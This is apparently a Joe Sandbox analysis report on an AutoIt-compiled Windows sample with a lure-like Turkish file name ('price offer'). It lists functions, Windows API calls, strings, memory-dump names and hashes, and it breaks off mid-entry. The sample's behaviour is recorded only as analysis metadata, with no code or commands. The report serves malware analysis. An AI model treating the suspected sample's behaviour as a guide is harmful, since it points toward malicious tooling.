Opcode Fuzzy Hash: 93ed60f92d95c2a5b0d0c6e7980a351a1dbd11fb816d7ec1e911b1d04289380c
Instruction Fuzzy Hash: 62D05EB654032877DA20E7E4AC0EFCB3A6CDB05760F0006A1B655E2091DAF09985CAD0

Uniqueness

Uniqueness Score: -1.00%

Function 00A07F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00A082F5
TerminateProcess.KERNEL32(00000000), ref: 00A082FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 00A084DD

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 0f273881d4430bbce442ff7ecde910f65f7809c1ea5f0b90d67759ed99b3630c
Instruction ID: 2d3dca1ca44dd09374501095085485b8431805b4cfab087675a1bea53a731f91
Opcode Fuzzy Hash: 0f273881d4430bbce442ff7ecde910f65f7809c1ea5f0b90d67759ed99b3630c
Instruction Fuzzy Hash: 43128A71A083059FC714DF28D484B6ABBE1BF88318F04895DE8998B392DB35ED45CF96

Uniqueness

Uniqueness Score: -1.00%

Function 009B5AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8988fa97faa82676f35d5cb7728323d140818e005969d0396274afb40ea12af
Instruction ID: 8e46a4f7cc161f8a70984ec467673a950c03f53333387d995dab81566f8f621d
Opcode Fuzzy Hash: f8988fa97faa82676f35d5cb7728323d140818e005969d0396274afb40ea12af
Instruction Fuzzy Hash: 6D51B071D006199BCB21AFE4CA45FEEBFB9EF46330F160459F405A7291D7359901CB61

Uniqueness

Uniqueness Score: -1.00%

Function 009810F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00981BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00981BF4
Part of subcall function 00981BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00981BFC
Part of subcall function 00981BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00981C07
Part of subcall function 00981BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00981C12
Part of subcall function 00981BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00981C1A
Part of subcall function 00981BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00981C22

Part of subcall function 00981B4A: RegisterWindowMessageW.USER32(00000004,?,009812C4), ref: 00981BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0098136A
OleInitialize.OLE32 ref: 00981388
CloseHandle.KERNEL32(00000000,00000000), ref: 009C24AB

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 4c5697c1d2e5d0bb55c1db96ab77281656f18068164dbc39dd5491935d52dfde
Instruction ID: fcb44e24441b34e39db6503841c8f647f4fc8ff28c5d99ff54fddd440242d44f
Opcode Fuzzy Hash: 4c5697c1d2e5d0bb55c1db96ab77281656f18068164dbc39dd5491935d52dfde
Instruction Fuzzy Hash: 147188B49113008FC794EFF9A945BB53AE4FB88396754962AE40AC7361FB304887CF55

Uniqueness

Uniqueness Score: -1.00%

Function 009854C6 Relevance: 4.6, APIs: 3, Instructions: 103COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 0098556D
SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 0098557D

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3328b2ac0c1d91df6b00cda215390ce8c1b39eb5a3cf98b443caf01b6288f84d
Instruction ID: d0cd5987ebd8febcff58d3818d9e5b11102389b93b960ffef3a00144dd87689e
Opcode Fuzzy Hash: 3328b2ac0c1d91df6b00cda215390ce8c1b39eb5a3cf98b443caf01b6288f84d
Instruction Fuzzy Hash: 36314971A00A09EFDB14DF68C880B99B7B6FB48314F158629F91997340D775FE98CB90

Uniqueness

Uniqueness Score: -1.00%

Function 009B86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,009B85CC,?,00A48CC8,0000000C), ref: 009B8704
GetLastError.KERNEL32(?,009B85CC,?,00A48CC8,0000000C), ref: 009B870E
__dosmaperr.LIBCMT ref: 009B8739

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: 056edbde636084b437eb45927fb763170576ff216f03f00e218a9c8ee05742c4
Instruction ID: 81dfb9f7f7031f7b0e52e78edae8a4d56680117364680a687ac6056d4c9f3376
Opcode Fuzzy Hash: 056edbde636084b437eb45927fb763170576ff216f03f00e218a9c8ee05742c4
Instruction Fuzzy Hash: 8B014E32605720A6D664B374AB49BFF678D4BCA778F39011DF8148B1D2DEA1CC81C190

Uniqueness

Uniqueness Score: -1.00%

Function 009F2FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,009F2CD4,?,?,?,00000004,00000001), ref: 009F2FF2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,009F2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009F3006
CloseHandle.KERNEL32(00000000,?,009F2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009F300D

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 8fb36017651820bf724b5baf22dc875865c2a1797cbec25d6cc861068b0b670c
Instruction ID: db3400f59308c74d812ab7b86ff1751eb4b30b7265035fb5923480b44d78d283
Opcode Fuzzy Hash: 8fb36017651820bf724b5baf22dc875865c2a1797cbec25d6cc861068b0b670c
Instruction Fuzzy Hash: FDE086322C022477D2302795BC0DFDB3A1CD786B71F108210F729790D086A0160243A8

Uniqueness

Uniqueness Score: -1.00%

Function 00991310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 009917F6

Strings

CALL, xrefs: 009917C6

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 511cf07de63e9eb281bdda3c3c03210c3a9c78d10a19eaac64bd4907779b0010
Instruction ID: 806f96a69fe22500487632e180f5019eb171a6b433cffbc48926f41726dd2d25
Opcode Fuzzy Hash: 511cf07de63e9eb281bdda3c3c03210c3a9c78d10a19eaac64bd4907779b0010
Instruction Fuzzy Hash: DE227B706083029FCB14DF18C494B2ABBF5BF89314F29895DF4968B3A1D735E885CB92

Uniqueness

Uniqueness Score: -1.00%

Function 009F6EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009F6F6B

Part of subcall function 00984ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 009F6F5A, 009F6F63

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: 6c80b3348d2d2c9170e8f2dbb493fd0f3a47b532b9b8f28d622612feef2e9f60
Instruction ID: d616c102480d9e64557e4b32f36a59174a8a73d85725ff9e68016ff70ed1a49c
Opcode Fuzzy Hash: 6c80b3348d2d2c9170e8f2dbb493fd0f3a47b532b9b8f28d622612feef2e9f60
Instruction Fuzzy Hash: 5FB14A311082058FDB14EF60C491ABAB7E5AFD4314F14895DF5969B2A2EB30ED49CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00982DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 009C2C8C

Part of subcall function 00983AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00983A97,?,?,00982E7F,?,?,?,00000000), ref: 00983AC2

Part of subcall function 00982DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00982DC4

Strings

X, xrefs: 009C2C5A

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: 7c1c18529d7b9cf126316958ca09f9f39be2fb371541eacf9ed3ff7677da27ef
Instruction ID: 17f0e6e01c506b4f12c835024bd5e3d25b6d23b94be763c6ba755ab8cb516238
Opcode Fuzzy Hash: 7c1c18529d7b9cf126316958ca09f9f39be2fb371541eacf9ed3ff7677da27ef
Instruction Fuzzy Hash: B221A571E002589FCF01EF94C845BEE7BFCAF89715F008059E405AB341DBB85A498FA2

Uniqueness

Uniqueness Score: -1.00%

Function 009F2557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 009F2587

Strings

EA06, xrefs: 009F25B9

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: 46f0d7e38552de842a05a1e758c33ea56f1a5cf3ff890760da14b5b26afff7f5
Instruction ID: 7d9295e5fec15b953a35631a6d0328d12c529d256e99fa69d30fd9e80e319a4e
Opcode Fuzzy Hash: 46f0d7e38552de842a05a1e758c33ea56f1a5cf3ff890760da14b5b26afff7f5
Instruction Fuzzy Hash: 2901B5729042587EDF18C7A8C856FFEBBF8DB46301F00455AF152D2181E5B8E6088BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00983837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00983908

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 00df1ed409dcfb5bcdb84e95dcdca567a2791c60ed843d82569fb48e8d049375
Instruction ID: bbcd000016774f0c8e0e2ed2095e7fdd57e682895aa0eec1e283f29b8ca0828b
Opcode Fuzzy Hash: 00df1ed409dcfb5bcdb84e95dcdca567a2791c60ed843d82569fb48e8d049375
Instruction Fuzzy Hash: 8831B470A04301DFD760EF64D894BA7BBE8FB49719F00492EF99A87350E771AA44CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00985745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0098949C,?,00008000), ref: 00985773
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0098949C,?,00008000), ref: 009C4052

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1bc4413bf270cf6ca913c745f062503fc6e8ecf9bc972d32bddf1cce2ba8fdb3
Instruction ID: 049f481e522462ef610982effd7e2963cbe2e27f67b339bf88e3d1c5439d9fcb
Opcode Fuzzy Hash: 1bc4413bf270cf6ca913c745f062503fc6e8ecf9bc972d32bddf1cce2ba8fdb3
Instruction Fuzzy Hash: E0019230285225B6E3305A6ACC0EFA77F98EF027B0F11C304BA9D6A1E0C7B45855CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00986E14 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,?,?,?,?,00989879,?,?,?), ref: 00986E33
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00989879,?,?,?), ref: 00986E69

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 7448b30c6775cd4d9bc56f0eb7d0c0df7a46bba1b6845a1111848016e84f8bd3
Instruction ID: 881273b6437f3378af5c019a910de064305dee2fba2b8a062797c7552ddf42d1
Opcode Fuzzy Hash: 7448b30c6775cd4d9bc56f0eb7d0c0df7a46bba1b6845a1111848016e84f8bd3
Instruction Fuzzy Hash: 5001F7753442007FEB18A7B9EC1BF7FBAADDBC5310F14413EB106DA2E2E960AD005620

Uniqueness

Uniqueness Score: -1.00%

Function 0098B710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0098BB4E

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: fc7944dde1176368261e37f3c570d97dd558b53741ae46ead8f5d78f733b32b8
Instruction ID: b1162b4c47b6d32447966f3d8c9a8c278c78be63b8b4f38308b1b079d879a194
Opcode Fuzzy Hash: fc7944dde1176368261e37f3c570d97dd558b53741ae46ead8f5d78f733b32b8
Instruction Fuzzy Hash: 1532DC34A00209AFDB24EF54C894BBEB7B9FF85314F18805AE915AB361D778ED41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 023510D0 Relevance: 1.7, APIs: 1, Instructions: 157COMMON

Download Yara Rule

APIs

Part of subcall function 023508E0: GetFileAttributesW.KERNELBASE(?), ref: 023508EB

CreateDirectoryW.KERNELBASE(?,00000000), ref: 023511FF

Memory Dump Source

Source File: 00000000.00000002.3704784227.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2350000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 6f8dcccc9308d6b7829d98f85973204c3d4d88340365b22c7c04f54bce7ee53f
Instruction ID: 4d2d196561d0a42b8f6d0e220aca8d92ef0ab0fe34aa5ef51a53e65c8d1643d0
Opcode Fuzzy Hash: 6f8dcccc9308d6b7829d98f85973204c3d4d88340365b22c7c04f54bce7ee53f
Instruction Fuzzy Hash: 69516831A1121D96DF24EFA0C954FEF737AEF58700F0045A9A90DE7280E7799B44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00984ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00984E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00984EDD,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984E9C
Part of subcall function 00984E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00984EAE
Part of subcall function 00984E90: FreeLibrary.KERNEL32(00000000,?,?,00984EDD,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984EC0

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984EFD

Part of subcall function 00984E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,009C3CDE,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984E62
Part of subcall function 00984E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00984E74
Part of subcall function 00984E59: FreeLibrary.KERNEL32(00000000,?,?,009C3CDE,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984E87

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: e00c20c97850801150b596cff49085407fe03ddcab957aadcb60b430eefa8d00
Instruction ID: fdd935ad77349451ec21906c04491c87c74ba3cc31654ddd6806da11f85ab32c
Opcode Fuzzy Hash: e00c20c97850801150b596cff49085407fe03ddcab957aadcb60b430eefa8d00
Instruction Fuzzy Hash: CF11E732650206AACF14FF60DC02FAD77A5AF80714F10842DF582A62C1EE749E459B50

Uniqueness

Uniqueness Score: -1.00%

Function 009B8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 009B8440

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 69dbeaed26da149f1845cfd379ea5715ed2376a06a3f96f0e537b1492878dac8
Instruction ID: 8cb0ea9ef8a170c5551c631ad667aa191c4e1e4842039055595290f4e7242aec
Opcode Fuzzy Hash: 69dbeaed26da149f1845cfd379ea5715ed2376a06a3f96f0e537b1492878dac8
Instruction Fuzzy Hash: 7511187590420AAFCF05DF98EA41ADB7BF9EF48314F114059FC08AB312DA31DA11CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00989A40 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,0098543F,?,00010000,00000000,00000000,00000000,00000000), ref: 00989A9C

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
